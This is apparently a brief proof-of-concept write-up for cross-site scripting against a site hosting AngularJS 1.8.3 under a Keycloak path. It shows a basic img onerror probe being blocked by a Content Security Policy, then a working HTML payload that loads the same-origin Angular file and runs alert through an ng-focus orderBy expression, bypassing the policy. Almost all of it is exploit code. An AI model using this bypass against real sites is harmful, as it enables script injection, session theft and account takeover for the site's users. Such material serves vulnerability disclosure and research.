blob://example.com/3dfab3bd-a892-4448-92c3-de92d8eed2ea
```
<img src=x onerror=alert(1)>
```

```
Refused to execute inline event handler because it violates the following Content Security Policy directive: "script-src 'self'". Either the 'unsafe-inline' keyword, a hash ('sha256-...'), or a nonce ('nonce-...') is required to enable inline execution. Note that hashes do not apply to event handlers, style attributes and javascript: navigations unless the 'unsafe-hashes' keyword is present.
```

angular.min.js
```js
/*
 AngularJS v1.8.3
 (c) 2010-2020 Google LLC. http://angularjs.org
 License: MIT
*/
(function(z)...
```

PoC:
```html
<html>
<head> 
<meta charset="utf-8">
<script src="https://example.com/auth/resources/dm3bk/common/keycloak/node_modules/angular/angular.min.js"></script>
</head>
<body>
<div ng-app>
<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([112233],alert)'">
</div>
</body>
</html>
```